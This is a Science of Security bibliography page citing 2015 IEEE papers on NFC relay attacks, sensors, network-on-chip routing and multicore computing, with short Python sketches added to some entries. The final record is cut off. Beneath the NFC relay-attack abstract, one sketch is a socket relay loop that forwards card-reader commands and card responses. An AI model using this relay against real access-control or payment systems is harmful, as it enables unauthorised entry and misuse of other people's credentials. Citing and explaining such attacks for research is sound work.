URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160443&isnumber=7160221
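
A probabilistic neural network is essentially a Parzen-window classifier with one Gaussian kernel per training pattern. The minimal sketch below shows that structure; the process variables, class labels and smoothing parameter are illustrative assumptions, not the paper's data.

```python
import numpy as np

class PNN:
    """Minimal probabilistic neural network: one Gaussian kernel per
    training pattern; the class score is the mean kernel response."""
    def __init__(self, sigma=0.5):
        self.sigma = sigma

    def fit(self, X, y):
        self.classes = np.unique(y)
        self.patterns = {c: X[y == c] for c in self.classes}
        return self

    def predict(self, X):
        out = []
        for x in X:
            scores = []
            for c in self.classes:
                d2 = np.sum((self.patterns[c] - x) ** 2, axis=1)
                scores.append(np.mean(np.exp(-d2 / (2 * self.sigma ** 2))))
            out.append(self.classes[int(np.argmax(scores))])
        return np.array(out)

# Hypothetical scaled boiler variables (e.g. drum pressure, superheater
# temperature); class 0 = normal operation, class 1 = anomaly.
rng = np.random.default_rng(1)
X = np.vstack([rng.normal(0, 0.3, (200, 2)), rng.normal(2, 0.3, (20, 2))])
y = np.array([0] * 200 + [1] * 20)
print(PNN(sigma=0.4).fit(X, y).predict(np.array([[0.1, -0.2], [2.1, 1.9]])))
```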

 

Cavdar, D.; Tomur, E., "A Practical NFC Relay Attack on Mobile Devices Using Card Emulation Mode," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1308-1312, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160477

Abstract: In this study, a practical card-emulated relay attack is implemented on Near Field Communication (NFC) equipped mobile devices. NFC is a promising communication technology that is also used in smart mobile devices. As an effective and flexible communication technology, NFC is frequently used today in innovative solutions such as payments and access control. Because of the nature of these transactions, security is a critical issue that should be considered in the system design and development phases. Although NFC is inherited from Radio Frequency Identification (RFID) technology, NFC security needs, requirements and solutions differ in terms of its usage areas and solutions. Consequently, security precautions in the communication layer of RFID technology do not prevent relay attacks that occur in the application layer of NFC solutions. This study demonstrates the practicability of relay attacks by using only mobile phones to relay credentials, instead of RFID-based smart cards, in an access control application. The Host Card Emulation (HCE) mode further eases relay attacks in NFC communication. The study presents the conceptual description of the proposed relay attack, the development and operating logic of the mobile applications based on card emulation mode and of the server software, and the basics of data communication between the modules, along with the web service descriptions.

Keywords: mobile communication; near-field communication; radiofrequency identification; relay networks (telecommunication); HCE mode; NFC relay attack; NFC security; RFID technology; Web services descriptions; access control application; card emulated relay attack; card emulation mode; communication layer; communication technology; data communication; flexible communication technology; host card emulation; mobile applications; near field communication; radio frequency identification technology; relay attacks; security precautions; server software; smart cards; smart mobile devices; Access control; Emulation; Mobile handsets; Radiofrequency identification; Relays; Smart cards; Card Emulation; Mobile; NFC; Relay Attack (ID#: 16-9348)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160477&isnumber=7160221
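
Conceptually, a relay attack is a blind forwarder between a reader-facing endpoint and a card-facing endpoint. The sketch below illustrates that forwarding loop with plain TCP sockets as a conceptual stand-in only: ports, roles and framing are hypothetical, and a real NFC relay runs HCE on the phones rather than sockets like these.

```python
import socket

def relay(reader_side_port=9001, card_side_port=9002):
    """Relay loop: one endpoint emulates the card to the reader, the other
    reads the genuine card; this server blindly shuttles command/response
    bytes (APDUs, in the NFC case) between them."""
    srv_r = socket.socket()
    srv_r.bind(("0.0.0.0", reader_side_port))
    srv_r.listen(1)
    srv_c = socket.socket()
    srv_c.bind(("0.0.0.0", card_side_port))
    srv_c.listen(1)
    reader_side, _ = srv_r.accept()   # phone emulating the card to the reader
    card_side, _ = srv_c.accept()     # phone reading the genuine card
    while True:
        cmd = reader_side.recv(4096)  # command issued by the reader
        if not cmd:
            break
        card_side.sendall(cmd)        # replay it to the real card
        rsp = card_side.recv(4096)    # card's response
        reader_side.sendall(rsp)      # replay it back to the reader

if __name__ == "__main__":
    relay()
```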

 

Dauksevicius, R.; Gaidys, R.; O'Reilly, E.P.; Seifikar, M., "Finite Element Modeling Of ZnO Nanowire with Different Configurations of Electrodes Connected to External Capacitive Circuit for Pressure Sensing Applications," in Thermal, Mechanical and Multi-Physics Simulation and Experiments in Microelectronics and Microsystems (EuroSimE), 2015 16th International Conference on, pp. 1-5, 19-22 April 2015. doi: 10.1109/EuroSimE.2015.7103134

Abstract: This paper reports the results of finite element modeling and analysis of a vertically-aligned ZnO nanowire, including the surrounding chip components (seed layer, insulating top layer and metal electrodes), taking into account the influence of external capacitance and considering different nanowire morphologies and electrode topographies in order to predict the magnitude of the electrical outputs as a function of the applied dynamic load (compression and/or bending). The length and diameter of the modeled nanowire are in the μm and sub-μm ranges, respectively, and it is intended to function as a single "piezo-pixel" in a matrix of interconnected ZnO nanowires performing dynamic pressure sensing, which could be used for ultraprecise reconstruction of the smallest fingerprint features in highly reliable security and ID applications.

Keywords: II-VI semiconductors; finite element analysis; nanowires; pressure sensors; zinc compounds; ZnO; applied dynamic load; chip components; dynamic pressure sensing; electrode topographies; external capacitive circuit; finite element modeling; insulating top layer; interconnected nanowires; metal electrodes; nanowire morphologies; pressure sensing applications; seed layer; ultraprecise reconstruction; vertically-aligned nanowire; Electrodes; Surfaces; Zinc oxide (ID#: 16-9349)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7103134&isnumber=7103074

 

Du, Gaoming; Yang, Xin; Chen, Fuzhan; Zhang, Duoli; Song, Yukun; Peng, Chen, "MPCC: Multi-Path Routing Packet Connect Circuit for Network-on-Chip," in Anti-counterfeiting, Security, and Identification (ASID), 2015 IEEE 9th International Conference on, pp. 86-91, 25-27 Sept. 2015. doi: 10.1109/ICASID.2015.7405667

Abstract: The Packet Connect Circuit (PCC) protocol is one of the NoC communication methods. Under the PCC protocol, data are transmitted in circuit form over a route established by packet switching. However, the traditional SPCC (single-path Packet Connect Circuit) routing algorithm has the disadvantage that its rate of channel building slows down when the chip is congested, directly reducing overall communication efficiency. To solve this problem, this paper presents the MPCC (multi-path Packet Connect Circuit) routing algorithm, which forms a more efficient NoC communication structure and markedly improves the efficiency of NoC data transmission under congestion. Experiments show that with MPCC, the average packet delay of the network decreases by 33.35% compared with the SPCC routing algorithm.

Keywords: Algorithm design and analysis; Data communication; Data models; Decoding; Heuristic algorithms; Magnetic heads; Routing; MPCC multi-path routing algorithm; network-on-chip; packet connect circuit (ID#: 16-9350)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7405667&isnumber=7405648

 

Shurman, M.; Al-Mistarihi, M.F.; Alhulayil, M., "Outage Probability of Dual-Hop Amplify-and-Forward Cognitive Relay Networks Under Interference Power Constraints over Nakagami-M Fading Channels," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 516-520, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160326

Abstract: In this paper, the outage probability (OP) performance of cognitive dual-hop relay networks with an amplify-and-forward (AF) relay, under spectrum sharing constraints on the primary user (PU), over independent and identically distributed (i.i.d.) Nakagami-m fading channels is investigated. An exact closed-form expression for the OP of the proposed system is derived under the peak interference power (Ip) constraint at the primary user. The impact of the PU location on the OP performance is also studied.

Keywords: Nakagami channels; amplify and forward communication; cognitive radio; probability; radio spectrum management; radiofrequency interference; relay networks (telecommunication); telecommunication network reliability; AF relay; IID Nakagami-m fading channel; OP; dual hop amplify and forward cognitive relay network outage probability; independent and identically distributed Nakagami-m fading channel; interference power constraint; primary user; spectrum sharing constraint; cognitive radio; Fading; Interference; Relay networks (telecommunications); Signal to noise ratio; Wireless networks; Nakagami-m fading; amplify-and-forward relaying; cognitive radio; cognitive relay network; dual hop; outage probability (ID#: 16-9351)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160326&isnumber=7160221
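
The paper derives an exact closed form; as a rough cross-check of the setup, the sketch below estimates the OP by Monte Carlo, using the facts that the Nakagami-m power gain is Gamma-distributed and that the standard AF end-to-end SNR expression applies. The parameter values and normalizations are our assumptions, not the paper's.

```python
import numpy as np

def nakagami_power_gain(m, omega, size, rng):
    """|h|^2 under Nakagami-m fading is Gamma(shape=m, scale=omega/m)."""
    return rng.gamma(m, omega / m, size)

def outage_probability(m=2.0, Ip_dB=10.0, gamma_th_dB=3.0, N=200_000, seed=0):
    """Monte Carlo OP of a dual-hop AF underlay link. Secondary transmit
    powers are capped by the peak interference Ip tolerated at the primary
    user; noise power is normalized to 1. A sketch only."""
    rng = np.random.default_rng(seed)
    Ip, g_th = 10 ** (Ip_dB / 10), 10 ** (gamma_th_dB / 10)
    g1 = nakagami_power_gain(m, 1.0, N, rng)    # source -> relay
    g2 = nakagami_power_gain(m, 1.0, N, rng)    # relay -> destination
    gp1 = nakagami_power_gain(m, 1.0, N, rng)   # source -> primary user
    gp2 = nakagami_power_gain(m, 1.0, N, rng)   # relay -> primary user
    snr1 = (Ip / gp1) * g1                      # interference-limited powers
    snr2 = (Ip / gp2) * g2
    snr_e2e = snr1 * snr2 / (snr1 + snr2 + 1)   # standard AF end-to-end SNR
    return np.mean(snr_e2e < g_th)

print(outage_probability())
```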

 

Ming, Li; Lijuan, Hong; Tengpeng, Zhang; Huili, Wang, "Efficiency Enhancement in Thin-Film Solar Cells By Silver Nanoparticles," in Optoelectronics and Microelectronics (ICOM), 2015 International Conference on, pp. 327-329, 16-18 July 2015. doi: 10.1109/ICoOM.2015.7398834

Abstract: The surface plasmon enhancement effect of metallic nanoparticles has the potential to enhance the efficiency of thin-film solar cells. In this study, the effect of silver nanoparticles on the reflectivity, quantum efficiency and spectral response of the solar cell was observed. The silver nanoparticles were synthesized by a simple method: magnetron sputtering followed by annealing within the sputtering system. Absorption enhancement was observed in the 600–800 nm spectral range. This enhancement can be attributed to photon scattering by the surface plasmons generated in the silver nanoparticles.

Keywords: Absorption; Nanoparticles; Photovoltaic cells; Plasmons; Silicon; Silver; Surface morphology; Amorphous silicon; Nanoparticle; Silver; Solar cell; Surface Plasmon (ID#: 16-9352)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7398834&isnumber=7398754

 

Biolek, Dalibor; Biolkova, Viera; Kolka, Zdenek, "Memristor Model for Massively-Parallel Computations," in Computing, Communication and Security (ICCCS), 2015 International Conference on, pp. 1-5, 4-5 Dec. 2015. doi: 10.1109/CCCS.2015.7374183

Abstract: The memristor model described in this paper is designed for building models of large networks for analog computations. A circuit containing thousands of memristors for finding the shortest path through a complicated maze is a typical example. The model is designed to meet the following criteria: 1. It is a model of the HP memristor with linear dopant drift that respects the physical bounds of the internal state variable. 2. It operates reliably in the SPICE environment, even when simulating extremely large networks. 3. It minimizes simulation time while computing bias points and during transient analyses. A benchmark circuit for testing applications of various complexities is presented. The results confirm correct operation of the model even in applications containing thousands of memristors.

Keywords: Adders; Arrays; Automatic test pattern generation; Built-in self-test; Circuit faults; SPICE; massively-parallel analog computations; memristor; model (ID#: 16-9353)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7374183&isnumber=7374113
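
For reference, the HP linear-dopant-drift model that such SPICE models implement can be integrated directly, as in the sketch below. The parameter values are illustrative only, and the hard clipping stands in for the paper's more careful treatment of the physical bounds of the state variable.

```python
import numpy as np

# HP memristor with linear dopant drift: the state w in [0, D] is the
# width of the doped region; illustrative parameter values, not the paper's.
R_ON, R_OFF, D, MU_V = 100.0, 16e3, 10e-9, 1e-14

def simulate(v_of_t, dt, steps, w0=0.1 * D):
    w, out = w0, []
    for k in range(steps):
        x = w / D
        R = R_ON * x + R_OFF * (1 - x)       # memristance M(w)
        i = v_of_t(k * dt) / R               # Ohm's law
        w += MU_V * (R_ON / D) * i * dt      # dw/dt = mu_v * R_on / D * i(t)
        w = min(max(w, 0.0), D)              # enforce physical bounds
        out.append((i, R))
    return out

# A sinusoidal drive produces the characteristic pinched hysteresis loop.
trace = simulate(lambda t: np.sin(2 * np.pi * t), dt=1e-3, steps=2000)
print(trace[-1])
```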


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Multicore Computing Security 2015

 

 
SoS Logo

Multicore Computing Security 2015

 

As high performance computing has evolved into larger and faster computing solutions, new approaches to security have been identified. The articles cited here focus on security issues related to multicore environments.  Multicore computing relates to the Science of Security hard topics of scalability, resilience, and metrics.  The work cited here was presented in 2015.


Dupros, F.; Boulahya, F.; Aochi, H.; Thierry, P., "Communication-Avoiding Seismic Numerical Kernels on Multicore Processors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 330-335, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.230

Abstract: The finite-difference method is routinely used to simulate seismic wave propagation both in the oil and gas industry and in strong-motion analysis in seismology. This numerical method also lies at the heart of a significant fraction of numerical solvers in other fields. In terms of computational efficiency, one of the main difficulties is the disadvantageous ratio between the limited pointwise computation and the intensive memory access required, leading to a memory-bound situation. Naive sequential implementations offer poor cache reuse and in general achieve a low fraction of the peak performance of the processors. The situation is worse on multicore computing nodes with several levels of memory hierarchy, where each cache miss corresponds to a costly memory access. Additionally, the memory bandwidth available on multicore chips improves slowly relative to the number of computing cores, which induces a dramatic reduction of the expected parallel performance. In this article, we introduce a cache-efficient algorithm for stencil-based computations using a decomposition along both the space and time directions. We report a maximum speedup of 3.59x over the standard implementation.

Keywords: cache storage; finite difference methods; gas industry; geophysics computing; multiprocessing systems; petroleum industry; seismic waves; seismology; wave propagation; Naive sequential implementations; cache-efficient algorithm; cache-reuse; communication-avoiding seismic numerical kernel; computational efficiency; finite-difference method; gas industry; memory bandwidth; memory hierarchy; multicore chips; multicore computing nodes; multicore processors; numerical method; numerical solvers; oil industry; peak performance; pointwise computation; seismic wave propagation simulation; seismology; stencil-based computations; strong motion analysis; Memory management; Multicore processing; Optimization; Program processors; Seismic waves; Standards; communication-avoiding; multicore; seismic (ID#: 16-9382)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336184&isnumber=7336120

 

Xiaohao Lin; Weichen Liu; Chunming Xiao; Jie Dai; Xianlu Luo; Dan Zhang; Duo Liu; Kaijie Wu; Qingfeng Zhuge; Sha, E.H.-M., "Realistic Task Parallelization of the H.264 Decoding Algorithm for Multiprocessors," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 871-874, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.33

Abstract: In recent years, hardware technology has developed ahead of software technology. Companies lack software techniques that can fully utilize modern multi-core computing resources, mainly due to the difficulty of investigating the parallelism inherent in a piece of software. This problem affects products ranging from energy-sensitive smartphones to performance-hungry data centers. In this paper, we present a case study on the parallelization of the complex industry-standard H.264 HDTV decoder application on multi-core systems. An optimal schedule of the tasks is obtained and implemented by a carefully defined software parallelization framework (SPF). The parallel software framework is proposed together with a set of rules to direct parallel software programming (PSPR). A pre-processing phase based on the rules is applied to the source code to make the SPF applicable. The task-level parallel version of the H.264 decoder is implemented and tested extensively on a workstation running Linux. Significant performance improvement is observed for a set of benchmarks composed of 720p videos. The SPF and the PSPR will together serve as a reference for future parallel software implementations and direct the development of automated tools.

Keywords: Linux; high definition television; multiprocessing systems; parallel programming; source code (software); video coding; H.264 HDTV decoder application; H.264 decoding algorithm; Linux; PSPR; SPF; data centers; energy-sensitive smart phones; multicore computing resources; multiprocessors; optimal task schedule; parallel software implementations; parallel software programming; performance improvement; preprocessing phase; realistic task parallelization; software parallelization framework; source code; task-level parallel; workstation; Decoding; Industries; Parallel processing; Parallel programming; Software; Software algorithms; Videos (ID#: 16-9383)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336273&isnumber=7336120

 

Cilardo, A.; Flich, J.; Gagliardi, M.; Gavila, R.T., "Customizable Heterogeneous Acceleration for Tomorrow's High-Performance Computing," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1181-1185, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.303

Abstract: High-performance computing as we know it today is experiencing unprecedented changes, encompassing all levels from technology to use cases. This paper explores the adoption of customizable, deeply heterogeneous manycore systems for future QoS-sensitive and power-efficient high-performance computing. At the heart of the proposed architecture is a NoC-based manycore system embracing medium-end CPUs, GPU-like processors, and reconfigurable hardware regions. The paper discusses the high-level design principles inspiring this innovative architecture as well as the key role that heterogeneous acceleration, ranging from multicore processors and GPUs down to FPGAs, might play for tomorrow's high-performance computing.

Keywords: field programmable gate arrays; graphics processing units; multiprocessing systems; network-on-chip; parallel processing; power aware computing; quality of service; FPGA; GPU-like processors; NoC-based many-core system; QoS-sensitive computing; customizable heterogeneous acceleration; heterogeneous acceleration; heterogeneous manycore systems; high-level design principles; high-performance computing; innovative architecture; medium-end CPU; multicore processors; power-efficient high-performance computing; reconfigurable hardware regions; Acceleration; Computer architecture; Field programmable gate arrays; Hardware; Program processors; Quality of service; Registers (ID#: 16-9384)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336329&isnumber=7336120 

 

Haidar, A.; YarKhan, A.; Chongxiao Cao; Luszczek, P.; Tomov, S.; Dongarra, J., "Flexible Linear Algebra Development and Scheduling with Cholesky Factorization," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 861-864, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.285

Abstract: Modern high performance computing environments are composed of networks of compute nodes that often contain a variety of heterogeneous compute resources, such as multicore CPUs and GPUs. One challenge faced by domain scientists is how to efficiently use all these distributed, heterogeneous resources. In order to use the GPUs effectively, the workload parallelism needs to be much greater than the parallelism for a multicore-CPU. Additionally, effectively using distributed memory nodes brings out another level of complexity where the workload must be carefully partitioned over the nodes. In this work we are using a lightweight runtime environment to handle many of the complexities in such distributed, heterogeneous systems. The runtime environment uses task-superscalar concepts to enable the developer to write serial code while providing parallel execution. The task-programming model allows the developer to write resource-specialization code, so that each resource gets the appropriate sized workload-grain. Our task-programming abstraction enables the developer to write a single algorithm that will execute efficiently across the distributed heterogeneous machine. We demonstrate the effectiveness of our approach with performance results for dense linear algebra applications, specifically the Cholesky factorization.

Keywords: distributed memory systems; graphics processing units; mathematics computing; matrix decomposition; parallel processing; resource allocation; scheduling; Cholesky factorization; GPU; compute nodes; distributed heterogeneous machine; distributed memory nodes; distributed resources; flexible linear algebra development; flexible linear algebra scheduling; heterogeneous compute resources; high performance computing environments; multicore-CPU; parallel execution; resource-specialization code; serial code; task-programming abstraction; task-programming model; task-superscalar concept; workload parallelism; Graphics processing units; Hardware; Linear algebra; Multicore processing; Parallel processing; Runtime; Scalability; Cholesky factorization; accelerator-based distributed memory computers; heterogeneous HPC computing; superscalar dataflow scheduling (ID#: 16-9385)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336271&isnumber=7336120
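
The task decomposition behind such runtimes is easiest to see in a tiled Cholesky: each block operation below (POTRF, TRSM, SYRK/GEMM) is one task whose data dependences a task-superscalar runtime can schedule across CPUs and GPUs. This serial NumPy sketch shows only the task structure, not the authors' runtime.

```python
import numpy as np

def tiled_cholesky(A, nb):
    """Right-looking tiled Cholesky; n must be a multiple of the tile
    size nb. Each block operation is one schedulable task."""
    A = A.copy()
    n = A.shape[0]
    for k in range(0, n, nb):
        ke = k + nb
        A[k:ke, k:ke] = np.linalg.cholesky(A[k:ke, k:ke])           # POTRF task
        for i in range(ke, n, nb):
            ie = i + nb
            A[i:ie, k:ke] = np.linalg.solve(                        # TRSM task
                A[k:ke, k:ke], A[i:ie, k:ke].T).T
        for i in range(ke, n, nb):
            ie = i + nb
            for j in range(ke, i + nb, nb):
                je = j + nb
                A[i:ie, j:je] -= A[i:ie, k:ke] @ A[j:je, k:ke].T    # SYRK/GEMM
    return np.tril(A)

rng = np.random.default_rng(0)
M = rng.standard_normal((8, 8))
A = M @ M.T + 8 * np.eye(8)          # symmetric positive definite test matrix
L = tiled_cholesky(A, nb=4)
print(np.allclose(L @ L.T, A))       # True
```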

 

Qiuming Luo; Feng Xiao; Yuanyuan Zhou; Zhong Ming, "Performance Profiling of VMs on NUMA Multicore Platform by Inspecting the Uncore Data Flow," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 914-917, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.47

Abstract: The NUMA (Non-Uniform Memory Access) multicore platform has recently become more and more popular, providing hardware-level support for many hot fields such as cloud computing and big data, where deploying virtual machines on NUMA is a key technology. However, performance degradation in virtual machines is not negligible, because the guest OS has little or inaccurate knowledge of the underlying hardware. Our research focuses on performance profiling of VMs on the multicore platform by inspecting the uncore data flow, and we design a performance profiling tool called VMMprof based on PMUs (Performance Monitoring Units). It supports the uncore part of the processor, a new capability beyond those of existing tools. Experiments show that VMMprof can identify typical factors that affect the performance of individual processes and of the whole system.

Keywords: data flow computing; memory architecture; multiprocessing systems; performance evaluation; virtual machines; NUMA multicore platform; PMU; VM performance profiling; VMMprof; hardware level support; nonuniform memory access; performance degradation; performance monitoring units; performance profiling tool; uncore data flow; uncore data flow inspection; virtual machines; Bandwidth; Hardware; Monitoring; Multicore processing; Phasor measurement units; Sockets; Virtual machining; NUMA; PMU; VMMprof; VMs; uncore (ID#: 16-9386)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336283&isnumber=7336120

 

Jiachen Xue; Chong Chen; Lin Ma; Teng Su; Chen Tian; Wenqin Zheng; Ziang Hu, "Task-D: A Task Based Programming Framework for Distributed System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1663-1668, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.299

Abstract: We present Task-D, a task-based distributed programming framework. Traditionally, programming for distributed systems requires either low-level MPI or high-level pattern-based models such as Hadoop/Spark. Task-based models are widely and successfully used for multicore and heterogeneous environments, but rarely for distributed ones. Task-D tries to bridge this gap by creating a higher-level abstraction than MPI while providing more flexibility than Hadoop/Spark for task-based distributed programming. The Task-D framework relieves programmers of the complexities involved in distributed programming. We provide a set of APIs that can be directly embedded into user code to enable the program to run in a distributed fashion across heterogeneous computing nodes. We also explore the design space and the features the runtime should support, including data communication among tasks, data sharing among programs, resource management, memory transfers, job scheduling, automatic workload balancing and fault tolerance. A prototype system is realized as one implementation of Task-D. A distributed ALS algorithm implemented using the Task-D APIs achieved significant performance gains compared to a Spark-based implementation. We conclude that task-based models can be well suited to distributed programming. Task-D not only improves programmability for distributed environments, but also leverages performance with effective runtime support.

Keywords: application program interfaces; message passing; parallel programming; automatic workload balancing; data communication; distributed ALS algorithm; distributed programming; distributed system; heterogeneous computing node; high-level pattern based; job scheduling; low-level MPI; resource management; task-D API; task-based programming framework; Algorithm design and analysis; Data communication; Fault tolerance; Fault tolerant systems; Programming; Resource management; Synchronization (ID#: 16-9387)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336408&isnumber=7336120

 

Beard, J.C.; Chamberlain, R.D., "Run Time Approximation of Non-blocking Service Rates for Streaming Systems," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 792-797, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.64

Abstract: Stream processing is a compute paradigm that promises safe and efficient parallelism. Its realization requires optimization of multiple parameters such as kernel placement and communications. Most techniques to optimize streaming systems use queueing network models or network flow models, which often require estimates of the execution rate of each compute kernel. This is known as the non-blocking "service rate" of the kernel within the queueing literature. Current approaches to divining service rates are static. To maintain a tuned application during execution (while online) with non-static workloads, dynamic instrumentation of service rate is highly desirable. Our approach enables online service rate monitoring for streaming applications under most conditions, obviating the need to rely on steady state predictions for what are likely non-steady state phenomena. This work describes an algorithm to approximate non-blocking service rate, its implementation in the open source RaftLib framework, and validates the methodology using streaming applications on multi-core hardware.

Keywords: data flow computing; multiprocessing systems; public domain software; compute kernel execution rate; dynamic instrumentation; kernel communications; kernel placement; multicore hardware; multiple parameter optimization; nonblocking service rate approximation; nonstatic workloads; nonsteady state phenomena; online service rate monitoring; open source RaftLib framework; parallelism; run-time approximation; service rate; steady state predictions; stream processing; streaming system optimization; streaming systems; Approximation methods; Computational modeling; Instruments; Kernel; Monitoring; Servers; Timing; instrumentation; parallel processing; raftlib; stream processing (ID#: 16-9388)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336255&isnumber=7336120

 

Bogdan, P.; Yuankun Xue, "Mathematical Models and Control Algorithms for Dynamic Optimization of Multicore Platforms: A Complex Dynamics Approach," in Computer-Aided Design (ICCAD), 2015 IEEE/ACM International Conference on, pp. 170-175, 2-6 Nov. 2015. doi: 10.1109/ICCAD.2015.7372566

Abstract: The continuous increase in integration densities contributed to a shift from Dennard's scaling to a parallelization era of multi-/many-core chips. However, for multicores to rapidly percolate the application domain from consumer multimedia to high-end functionality (e.g., security, healthcare, big data), power/energy and thermal efficiency challenges must be addressed. Increased power densities can raise on-chip temperatures, which in turn decrease chip reliability and performance, and increase cooling costs. For a dependable multicore system, dynamic optimization (power / thermal management) has to rely on accurate yet low complexity workload models. Towards this end, we present a class of mathematical models that generalize prior approaches and capture their time dependence and long-range memory with minimum complexity. This modeling framework serves as the basis for defining new efficient control and prediction algorithms for hierarchical dynamic power management of future data-centers-on-a-chip.

Keywords: multiprocessing systems; power aware computing; temperature; Dennard scaling; chip performance; chip reliability; complex dynamics approach; control algorithm; data-centers-on-a-chip; dynamic optimization; hierarchical dynamic power management; many-core chips; multicore chips; multicore platform; on-chip temperature; power density; power management; prediction algorithm; thermal management; Autoregressive processes; Heuristic algorithms; Mathematical model; Measurement; Multicore processing; Optimization; Stochastic processes (ID#: 16-9389)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7372566&isnumber=7372533

 

Mohamed, A.S.S.; El-Moursy, A.A.; Fahmy, H.A.H., "Real-Time Memory Controller for Embedded Multi-core System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 839-842, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.133

Abstract: Modern chip multiprocessors (CMPs) are nowadays in increasing demand because of their high performance, especially in real-time embedded systems. At the same time, bounded latencies have become vital to guarantee high performance and fairness for applications running on CMP cores. We propose MCES, a new memory controller that prioritizes cores and assigns them defined quotas within a unified epoch. Our approach works with a variety of generations of double data rate DRAM (DDR DRAM). MCES achieves an overall performance improvement of up to 35% for a 4-core system.

Keywords: DRAM chips; embedded systems; multiprocessing systems; CMP cores; DDR-DRAM; MCES; bounded latencies; chip multicores; double-data-rate DRAM generation; embedded multicore system; real-time embedded systems; real-time memory controller; unified epoch; Arrays; Interference; Multicore processing; Random access memory; Real-time systems; Scheduling; Time factors; CMPs; Memory Controller; Real-Time (ID#: 16-9390)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336266&isnumber=7336120

 

Songyuan Li; Jinglei Meng; Licheng Yu; Jianliang Ma; Tianzhou Chen; Minghui Wu, "Buffer Filter: A Last-Level Cache Management Policy for CPU-GPGPU Heterogeneous System," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 266-271, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.290

Abstract: There is a growing trend towards heterogeneous systems, which contain CPUs and GPGPUs on a single chip. Managing the various on-chip resources shared between CPUs and GPGPUs, however, is a big issue, and the last-level cache (LLC) is one of the most critical resources due to its impact on system performance. Well-known cache replacement policies such as LRU and DRRIP, designed for a CPU, are not well suited to heterogeneous systems, because the LLC becomes dominated by memory accesses from the thousands of threads of GPGPU applications, which can lead to significant performance degradation for the CPU. Another reason is that a GPGPU is able to tolerate memory latency when the number of active threads in the GPGPU is sufficient, but those policies do not exploit this feature. In this paper we propose Buffer Filter, a novel shared LLC management policy for CPU-GPGPU heterogeneous systems that takes advantage of the memory latency tolerance of GPGPUs. The policy restricts streaming requests of the GPGPU by adding a buffer to the memory system, vacating LLC space for cache-sensitive CPU applications. Although there is some IPC loss for the GPGPU, its memory latency tolerance preserves the basic performance of GPGPU applications. The experiments show that the Buffer Filter is able to filter 50% to 75% of the total GPGPU streaming requests at the cost of a small GPGPU IPC decrease, and improves the hit rate of CPU applications by 2x to 7x.

